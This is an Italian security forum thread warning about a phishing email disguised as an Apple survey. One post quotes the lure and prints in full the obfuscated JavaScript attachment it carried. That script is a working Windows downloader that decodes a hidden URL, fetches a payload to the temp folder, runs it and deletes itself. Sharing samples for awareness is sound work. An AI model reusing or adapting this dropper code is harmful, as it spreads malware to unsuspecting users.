Finto sondaggio Apple

Parliamo qui dei rootkit hypervisor-level, ma anche di quale piattaforma mobile preferire o delle ripercussioni di Facebook sulla nostra privacy.
Regole del forum
Rispondi
Avatar utente
Al3x
Amministratore
Amministratore
Messaggi: 3929
Iscritto il: mer mag 01, 2013 12:59 pm
Località: http://127.0.0.1

Finto sondaggio Apple

Messaggio da Al3x » mer apr 13, 2016 5:06 pm

Messaggio con allegato che si spaccia per un sondaggio, di seguito il testo:

Gentile cliente, Apple desidera invitarti a partecipare ad un sondaggio sul Web in-store presso il Negozio Apple Store. Il tuo punto di vista e molto importante per Apple e il team AppleCare. Tutte le informazioni che fornirai saranno trattate nel rispetto della normativa sulla tutela della privacy di Apple e saranno utilizzate esclusivamente per migliorare i nostri programmi di supporto e le offerte di prodotti. Per partecipare al sondaggio, fai clic sull'indirizzo accesso.doc Si prega di completare il sondaggio entro 7 giorni. Cordialmente, Il Supporto AppleCare

L'allegato è un file con estensione js, nel mio caso documento_25.js

nello spoiler c'è il codice che è al suo interno

Codice: Seleziona tutto

function VKOm(HwO, amqnj, ZIQgpr, tKAWM) {
	var fWgHa = 17734;
	switch (amqnj) {
	case false:
		var eWIMbO = true;
		break;
	case "1":
		if (HwO == 14327) {
			var tyyb = 42365;
		}
		break;
	case "BVeO":
		if (ZIQgpr == false) {
			var Bvgf = 57326;
		}
		break;
	};
}
function wiUVj(xGli) {
	return parseInt(xGli);
}
function EVOE(rUG) {
	var pCvfXOH = '';
	var VMak = (4175, 149, 9242, 0);
	var lMzqBV = "SgHBBdsTDbx".length;
	var JQITjnO = (4175, 149, 9242, 0);
	var RTJhwemt = "";
	while (JQITjnO < rUG.length - (4962, 9665, 3211, 7456, 3542, 3177, 229, 5441, 7737, 6445, 7602, 9454, 2)) {
		var TNNFOYka = rUG.charAt(JQITjnO);
		var KrmFeV = rUG.charAt(JQITjnO + (1020, 8459, 4087, 2796, 2633, 4231, 2038, 9901, 4710, 4771, 1));
		var NOFa = rUG.charAt(JQITjnO + (4962, 9665, 3211, 7456, 3542, 3177, 229, 5441, 7737, 6445, 7602, 9454, 2));
		RTJhwemt = TNNFOYka + KrmFeV + NOFa;
		var CSxlZ = rUG.charAt(JQITjnO);
		var DHJkFnxD101 = (rUG.charAt(JQITjnO) == (4175, 149, 9242, 0));
		var DHJkFnxD102 = (rUG.charAt(JQITjnO + (1020, 8459, 4087, 2796, 2633, 4231, 2038, 9901, 4710, 4771, 1)) == (4175, 149, 9242, 0));
		var kOH = (4175, 149, 9242, 0);
		if (CSxlZ == kOH) {
			var DmYhPQEb = JQITjnO + (1020, 8459, 4087, 2796, 2633, 4231, 2038, 9901, 4710, 4771, 1);
			var xrbLBgL = rUG.charAt(JQITjnO + (2));
			RTJhwemt = rUG.charAt(DmYhPQEb) + xrbLBgL;
		}
		if (DHJkFnxD101 && DHJkFnxD102) {
			var RAuMq = JQITjnO + (4962, 9665, 3211, 7456, 3542, 3177, 229, 5441, 7737, 6445, 7602, 9454, 2);
			RTJhwemt = rUG.charAt(RAuMq);
		}
		VMak = wiUVj(RTJhwemt);
		var sw = JQITjnO / (7854, 381, 1275, 545, 29, 4610, 1137, 693, 6403, 5813, 3) % lMzqBV;
		var DHJkFnxD = "SgHBBdsTDbx".charCodeAt(sw);
		VMak = VMak ^ DHJkFnxD;
		var muZo = String;
		pCvfXOH += muZo.fromCharCode(VMak);
		JQITjnO += (3);
	}
	return pCvfXOH;
}
function yYAR(GrG, bzpE, vNziB, oEBMK) {
	switch (GrG) {
	case "0":
		if (GrG === "ggcvhVU") {
			var kxuFj = false;
		}
		break;
	case "0":
		var zMfEG = "lVgwtA";
		if (zMfEG == "VONu") {
			var PZqk = "mfML";
		}
		break;
	};
	switch (GrG) {
	case 15732:
		if (vNziB == 10039) {
			var dGN = 4198;
			var UExJs = 8583;
			var lRsP = 421;
			dGN = UExJs - lRsP;
			var Gjz = 1737;
			var UCo = 6898;
			var UiovO = 1870;
			Gjz = UCo / UiovO;
			lRsP = UExJs / UiovO;
		}
		break;
	case "0":
		var WONv = true;
		if (WONv == 5702) {
			var QiByDeM = true;
			if (bzpE == false) {
				var KWLBEgT = 6311;
				KWLBEgT = 7046 * 7175;
				var AvkMg = 5532;
				AvkMg = 5693 / 821;
			}
			var hpBJq = 4597;
			switch ("1") {
			case "pidxOFHo":
				if (vNziB === "vSxBgWbC") {
					var JxhS = 9446;
					var TDs = 4055;
					var juw = 4353;
					JxhS = TDs - juw;
					JxhS = 3053 * 28;
				}
				break;
			case "0":
				var exC = true;
				break;
			};

		}
		break;
	case false:
		var MXZJLN = "yjRD";
		if (MXZJLN == true) {
			var XsK = "eDSt";
		}
		break;
	case "QTt":
		if (bzpE == 5021) {
			var fZciX = 4723;
			var chEl = 5102;
			var ytqRB = 5045;
			fZciX = chEl - ytqRB;
			var evt = 7997;
			evt = evt * ytqRB;
			ytqRB = fZciX / chEl;
			ytqRB = 9042 + 2975;
			evt = evt + ytqRB;
		}
		break;
	};
	if (GrG === "0") {
		var KyQ = 8964;
		var gtEtsIj = 2218;
		var boSuB = 7591;
		KyQ = gtEtsIj - boSuB;
		KyQ = 6055 * 5481;
	}
	var iCIAxW = true;
}
function wCJnXCL(HAlFx, NAYCg) {
	switch ("1") {
	case "1":
		var FLGJc = true;
		break;
	case 17718:
		var CVEn = "HqdWZ";
		if (CVEn == 6547) {
			var XMCGcR = "uUgwfi";
			switch (NAYCg) {
			case "YPkBw":
				var hQarzKO = 22611;
				break;
			case "hFlAjjwK":
				var modswM = false;
				if (modswM == "YphqwODK") {
					var AfMAxlk = "ydJx";
				}
				break;
			case "qwgASQPb":
				var uvYTyI = false;
				if (uvYTyI == true) {
					var KFdyiO = false;
				}
				break;
			case false:
				if (HAlFx == "HMmMIjde") {
					var jFnMTUw = false;
				}
				break;
			case 7620:
				var uYi = "uFxICHn";
				break;
			};
			var GILovYb = "ieiz";
			switch ("0") {
			case 2341:
				if (NAYCg == 10719) {
					var Dwpjf = 270;
					Dwpjf = 6618 * 7878;
					var cgrFDGP = 6712;
					cgrFDGP = 5537 - 5721;
					var BazFj = 5744;
					var yxNG = 3838;
					BazFj = cgrFDGP + yxNG;
					cgrFDGP = 9342 - 6657;
				}
				break;
			case true:
				var bulldYZ = "pCuTZiN";
				if (bulldYZ == "1") {
					var oSOX = "qMNyeA";
				}
				break;
			};
			var iNIN = 4859;
			var dCyDCM = 3192;
			var IuqBxfJ = 2798;
			iNIN = dCyDCM / IuqBxfJ;
			var EJdd = 9521;
			var FYpxf = 4495;
			EJdd = FYpxf + dCyDCM;
		}
		break;
	case false:
		var bOqJi = 56291;
		break;
	case true:
		var SVNHaKu = "mfynXP";
		break;
	case false:
		var ercv = false;
		break;
	};
	var iLGezn = "jIJw";
	return 0;
}
function HqTWToP() {
	var xDnxzCLs = EVOE("000004058043050016026058035076062058011045017059023007049041045026057002043054");
	var IaIu = EVOE("030052016015014086093012009046048007051024");
	var hzoDEkm = EVOE("018035007006000074032032054007025062");
	switch (12951) {
	case "VDZJlp":
		if (1 === true) {
			var sXFqXdT = "duejrhR";
		}
		break;
	case false:
		var yPms = false;
		break;
	case 1991:
		var bsa = 8451;
		break;
	};
	var gffH = false;
	switch (5) {
	case "1":
		var oeNBxVL = 36089;
		break;
	case "rDIajs":
		var UByZPD = 20344;
		break;
	case "CrHwSgwH":
		var TudGWAB = true;
		break;
	case "1":
		var rZgaa = 28117;
		break;
	case "wQSYhAua":
		var PRvv = 68571;
		break;
	};
	if (5 == "0") {
		var LIEhzx = 1227;
		var skX = 7614;
		var XBHDsq = 8671;
		LIEhzx = skX + XBHDsq;
		var ysHzIa = 4120;
		XBHDsq = ysHzIa / LIEhzx;
		skX = skX - ysHzIa;
		XBHDsq = LIEhzx + skX;
		LIEhzx = 133 + 7243;
	};
	var jTldPesF = EVOE("059019060050120075092053055022010050073043048039005007049055001023039019102033045009092039048003012032072") + Math[EVOE("053011039045048")](Math[EVOE("033006038038045009")]() * (9910, 1817, 2001, 4568, 693594)) + EVOE("125") + Math[EVOE("053011039045048")](Math[EVOE("033006038038045009")]() * (4262, 9931, 1509, 7343, 8795, 1495, 9827, 5618, 3180, 4385, 3828));
	switch (true) {
	case "0":
		var HqOV = 35204;
		if (HqOV == "1") {
			var BVlJpyx = 2035;
			var Dqg = 5807;
			var fdwvRs = 8090;
			BVlJpyx = Dqg - fdwvRs;
			BVlJpyx = Dqg - fdwvRs;
		}
		break;
	case false:
		var Wmx = "LefAj";
		break;
	};
	switch (1) {
	case 11710:
		var rDKK = 6797;
		if (rDKK === "0") {
			var kmpm = 14741;
		}
		break;
	case false:
		if (5 === "PrQbHc") {
			var CSZYXH = "pkcZo";
		}
		break;
	case "1":
		if (6 == "hCrwNtwc") {
			var xrVa = 16963;
		}
		break;
	};
	var SSrVcB = "RYhpjF";
	var aFYDWvr = 28337;
	if (aFYDWvr === "1") {
		var Zjxo = 3700;
		var oJdke = 4047;
		var HbDb = 772;
		Zjxo = oJdke * HbDb;
		var VyJ = 7226;
		var hmnpy = 5701;
		var WPkRb = 5552;
		VyJ = hmnpy - WPkRb;
	};
	var PikmINYa = EVOE("004052043048043020007122023010029063011");
	var Ga = new ActiveXObject(IaIu);
	var bOVBdyf = EVOE("020034028");
	Ga[EVOE("060023045044")](bOVBdyf, jTldPesF, false);
	var Lay = WScript[EVOE("000004058043050016053033040014054050010045")];
	Ga[EVOE("032002038038")]();
	if (Ga[EVOE("000019041054055023")] == (1450, 6560, 3711, 9831, 9746, 8920, 8367, 200)) {
		var lBuqUZ = new ActiveXObject(xDnxzCLs);
		var Jix = new ActiveXObject(hzoDEkm);
		var kgQcjnA = false;
		switch (6) {
		case "0":
			var BVOiA = 76452;
			break;
		case "FVvhILK":
			if (6 == 5968) {
				var cymR = 6211;
				cymR = 8676 * 3361;
				var YFBM = 3135;
				var prgfcTG = 9398;
				YFBM = prgfcTG * cymR;
				var JobFbu = 328;
				cymR = prgfcTG - JobFbu;
				var DlOKb = 8250;
				YFBM = DlOKb / prgfcTG;
			}
			break;
		case "nkq":
			if (5 == "AElurm") {
				var xpHJJZe = 3445;
				xpHJJZe = 5128 * 271;
				var jXRZDMu = 7182;
				jXRZDMu = 5736 + 9694;
				var uPmtru = 6605;
				uPmtru = 8152 / 4039;
				var gwHda = 7827;
				gwHda = 878 - 4517;
				gwHda = 7065 / 464;
			}
			break;
		case "0":
			var ezeO = 79287;
			break;
		};
		var Fvr = "hunNU";;
		var RlURqBSe = lBuqUZ[EVOE("020002060017050001016061037014062060011044039048")]((4503, 4768, 2)) + '\\' + lBuqUZ[EVOE("020002060022039009003026037015029")]();
		Jix[EVOE("028023045044")]();
		Jix[EVOE("007030056039")] = (5302, 1900, 1);
		var HZeLy = new ActiveXObject(PikmINYa);
		Jix[EVOE("004021033054039")](Ga[EVOE("001002059050045010000049006013028042")]);
		Jix[EVOE("003008059043054013028058")] = (7192, 1809, 6968, 9188, 6372, 4606, 3450, 0);
		if (2 == false) {
			var altc = 922;
			var ocTbX = 1335;
			var PEtYh = 2832;
			altc = ocTbX + PEtYh;
			var AAEkW = 1011;
			AAEkW = AAEkW / altc;
		}
		var nItHB = 66294;
		if (nItHB === "qaeuomOs") {
			var QBcq = 7089;
			QBcq = 3777 + 4824;
			var heidnht = 883;
			var vYP = 1622;
			var QPoJez = 8025;
			heidnht = vYP - QPoJez;
			var uEl = 3254;
			uEl = 7645 - 3537;
			QPoJez = 7608 + 1767;
		}
		switch (5556) {
		case true:
			var pAM = false;
			if (pAM == 13416) {
				var sCwC = "sSywm";
			}
			break;
		case "EWCYpev":
			if (2 === false) {
				var cPk = 30269;
			}
			break;
		case "kMqSS":
			var JbkWNT = 86111;
			break;
		};
		if (1 === 13674) {
			var CVaBl = "WcIJ";
		};
		Jix[EVOE("000006062039022011053061040007")](RlURqBSe);
		Jix[EVOE("016011039049039")]();
		HZeLy.run(EVOE("048010044108039028022116107001088") + RlURqBSe, (7192, 1809, 6968, 9188, 6372, 4606, 3450, 0));
	}
	lBuqUZ[EVOE("055002036039054001053061040007")](Lay);
}
function xrEX(exdm, NNdub, MYM) {
	var TvWJf = true;
	if (TvWJf == 15042) {
		var pPZ = "LCirNp";
	}
}
function SpVchW(rvL, nexN) {
	switch (true) {
	case "yajIJC":
		var aTOmSVo = false;
		if (aTOmSVo === 6443) {
			var TFAh = true;
		}
		break;
	case "kCUM":
		var KFjZ = "dOdh";
		if (KFjZ == true) {
			var syv = 18582;
		}
		break;
	case 3396:
		var igIhl = 64326;
		if (igIhl === false) {
			var UCaOLi = 7663;
			UCaOLi = 8459 / 4302;
			var kjav = 6483;
			kjav = 6097 - 6917;
		}
		break;
	case false:
		if (rvL == "0") {
			var hcVh = true;
		}
		break;
	};
	var VpgqZ = "ZivgR";
	switch ("1") {
	case true:
		var STkAIGl = true;
		if (STkAIGl === "0") {
			var MXFFQQ = 1124;
			var ePrj = 3434;
			MXFFQQ = MXFFQQ + ePrj;
			var xrkax = 772;
			xrkax = 5281 / 7605;
			xrkax = 8650 * 3036;
		}
		break;
	case true:
		var igYB = false;
		break;
	case "1":
		var jjt = "xanP";
		break;
	case true:
		var gOc = false;
		break;
	};
	var xlUwNa = false;
	if (xlUwNa === true) {
		var ZZZwZmm = 37738;
	}
	if (VpgqZ === true) {
		var CGr = 667;
		CGr = 6496 * 4265;
		CGr = 9128 * 1571;
		var AUo = 5576;
		AUo = 7854 - 5226;
		var PEMfKdf = 718;
		PEMfKdf = 1464 / 891;
	}
	return 1;
}
try {
	if (wCJnXCL(true, "1") == false) {
		yYAR(false, "1", true, 13712);
	}
	if (SpVchW("xXF", false) != 1) {
		VKOm(4061, true, false, false);
	} else {
		HqTWToP();
	}
	xrEX(false, "1", "0");
} catch (nGTk) {}
I :amore Sasha

System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Finto sondaggio Apple

Messaggio da System » mer apr 13, 2016 5:06 pm


Avatar utente
crazy.cat
Amministratore
Amministratore
Messaggi: 7654
Iscritto il: mer mag 01, 2013 4:02 pm
Località: Noventa Padovana

Re: Finto sondaggio Apple

Messaggio da crazy.cat » mer apr 13, 2016 7:07 pm

E' arrivato anche dal mio cliente, insieme a una presunta lettera di un avvocato dannatamente credibile, buon italiano, parlava di danni e sinistri proprio la cosa di cui si occupano.
Lo fregava l'allegato, un file doc chiamato conto_24.doc che non era proprio reale.
Il problema è che l'utente l'avrebbe aperto sicuramente.
Perdona i tuoi nemici, ma non dimenticare mai i loro nomi.

System
System
Bot ufficiale TurboLab.it
Bot
Messaggi:
Iscritto il: sab dic 31, 2016 6:19 pm
Contatta: Contatta

Re: Re: Finto sondaggio Apple

Messaggio da System » mer apr 13, 2016 7:07 pm


Rispondi
  • Argomenti simili
    Risposte
    Visite
    Ultimo messaggio